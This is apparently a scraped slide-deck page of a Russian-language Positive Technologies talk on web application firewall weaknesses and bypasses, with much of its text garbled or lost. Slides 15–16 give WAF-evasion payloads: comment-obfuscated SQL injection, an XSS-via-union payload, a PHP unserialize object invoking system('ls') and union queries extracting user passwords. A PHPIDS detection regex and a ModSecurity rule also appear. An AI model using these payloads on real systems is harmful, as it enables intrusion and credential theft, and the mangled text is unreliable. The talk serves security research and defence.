WAF ½°ˆµ ²µ?!

download WAF ½°ˆµ ²µ?!

of 21

  • date post

    07-Dec-2014
  • Category

    Technology

  • view

    1.932
  • download

    0

Embed Size (px)

description

Использование Web Application Firewall вызвано желанием снизить существующие угрозы со стороны атак, направленных на эксплуатацию уязвимостей в Web-приложениях. Однако, как и все созданное человек, WAF имеет недостатки, которые позволяют воспользоваться уязвимостями даже на самых защищенных серверах…

Transcript of WAF ½°ˆµ ²µ?!

  • 1. WAF - ?! Positive Technologies
  • 2. -
      • - ( 2009 , http://ptsecurity.ru/analytics.asp )
  • 3. ?
      • IBM X-Force 2009 Trend and Risk Report ( http://www.servicemanagementcenter.com/main/pages/IBMRBMS/SMRC/ShowCollateral.aspx?oid=74711 )
  • 4. ?
    • ScanSafe -
      • 114 - SQL-
      • http://www.securitylab.ru/news/394644.php
    • Network Solutions
      • Securi Security Stop Malvertising, , WordPress, Joomla
      • http://xakep.ru/post/51852/
    • SQL-
      • Heartland Payment Systems , 129 , SQL-
      • http://www.bytemag.ru/articles/detail.php?ID=14366
      • Remote File Inclusion
      • http://www.securitylab.ru/news/390028.php
    • Asprox -
      • Net-Worm.Win32.Aspxor -, SQL-, iframe-
      • http://www.securitylab.ru/news/395378.php
  • 5.
      • zone-h.org ( http://zone-h.org/stats/ymd )
  • 6. ,
      • ( 2009 , http://ptsecurity.ru/analytics.asp )
  • 7.
      • % ( 2009 , http://ptsecurity.ru/analytics.asp )
  • 8. WAF?
  • 9. Web Application Firewall (WAF) http:// server /?id=6329&print=Y WAF Webserver http:// server /?id=5351 http:// server /?id=8234 http:// server /? id=">
  • 10.
    • :
      • / / -
      • ( CMS/ )
    • :
      • ( Signatures&Negative Security )
      • ( Rules&Positive Model )
      • ( Learning )
      • :
      • Web Application Firewall Evaluation Criteria ( http://projects.webappsec.org/Web-Application-Firewall-Evaluation-Criteria )
  • 11.
    • -
  • 12.
    • :
    • **admin, user**, r**t ,
  • 13.
    • SQL
      • ( SQL )
      • Dom-based XSS
    • ()
      • Local File Including , PHP wrappers, null-byte
      • Remote File Including , URL
  • 14. PHPIDS??!
    • ?
    • REGEXP:
    • (?:%c0%ae/)|(?:(?:/|(home|conf|usr|etc|proc|opt|s?bin|local|dev|tmp|kern|[br]oot|sys|system|windows|winnt|program|%[a-z_-]{3,}%)(?:/|)|(?:(?:/|inetpub|localstart.asp|boot.ini)
  • 15.
    • SQL-
      • /*!sql-code*/ /*! 12345 sql-code*/
    • XSS over SQLi
    • /?id=-1/*!+union+select+' %3Cscri '+' pt%3Eal '+' ert(1)%3C/script%3E ',2,3*/
    • over unserialize(), :
      • O:8:"Database":1:{s:8:"shutdown";a:2:{i:0;s:6:" system ";i:1;s:2:" ls ";}}
      • cookie[sessid]=Tzo4OiJEYXRhYmFzZSI6MTp7czo4OiJzaHV0ZG93biI7YToyOntpOjA7czo2OiJzeXN0ZW0iO2k6MTtzOjI6ImxzIjt9fQ0KDQo=
    • HTTP Parameter Pollution , HTTP Parameter Fragmentation , null-byte , etc
    ModSecurity??!
  • 16. KIS??!
      • /?id=1+and+(select+( @v:=password )+from+users+limit+0,1)+union+select+ @v --
      • /?id=1+and+(select+( @v:=password )+from+users+limit+1,1)+union+select+ @v --
      • ..
      • /?id=1 union select password from users
  • 17. -
    • ( SDLC)
    • ( CIS, etc)
  • 18. WAF ( Virtual Patching )
  • 19.
    • ( eq MaxPatrol )
    • , , Web Application Firewall
      • :
      • SecRule ARGS:id "!^d{1,8}$" "deny,log,status:403,msg:'just-in-time patching #1'"
    • WAF (eq ModSecurity),
    WAF ( Virtual Patching )
  • 20.
    • WAF " "
      • WAF - ,
      • WAF -
    • WAF , ( )
    • WAF -
      • ,
  • 21. ! [email_address] http://devteev.blogspot.com/